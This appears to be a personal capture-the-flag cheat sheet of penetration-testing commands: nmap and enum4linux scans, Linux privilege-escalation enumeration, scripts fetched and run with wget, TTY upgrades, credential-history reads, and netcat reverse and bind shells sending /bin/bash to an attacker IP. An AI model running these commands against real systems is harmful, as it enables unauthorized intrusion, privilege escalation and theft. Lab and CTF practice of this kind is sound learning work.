ctf flag CTF ping ping $(target)
nmap nmap -p- -A $(target)
nmap -sV -sC --script vuln -oN blue.nmap 127.0.0.1
enum4linux enum4linux $(target)
sudo -l sudo -l
cron cat /etc/crontab
# - check scripts that are executed as root - can you edit them
# - check PATH, can you create script that will be executed instead of intended one ?
linpeas.sh wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
LinEnum.sh wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
lse.sh wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh
chmod +x lse.sh
./lse.sh
linux exploit suggester 2 wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl
chmod +x linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl
python local server python3 -m http.server
scp scp -i id_rsa /home/kali/workspace/exploit/45010 barry@10.10.230.234:/home/barry/
python shell python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
CTRL+Z
stty raw -echo; fg
netcat nc shell ATTACKER: netcat -lvnp 4444
TARGET: netcat 10.18.9.175 4444 -e /bin/bash
--
TARGET: netcat -lvp 4444 -e /bin/bash
ATTACKER: netcat 10.10.161.83 4444
gobuster gobuster -u http://10.10.10.24 -w /usr/share/wordlists/dirb/common.txt
autorecon autorecon 10.10.99.99
SUID, SGID and Sticky Bits find / -perm -u=s -type f 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
History history
cat ~/.bash_history | less
cat ~/.mysql_history | less
cat ~/.nano_history | less
cat ~/.*history | less
hash https://gchq.github.io/CyberChef/ notes joplin xmind.net cherrytree keepnote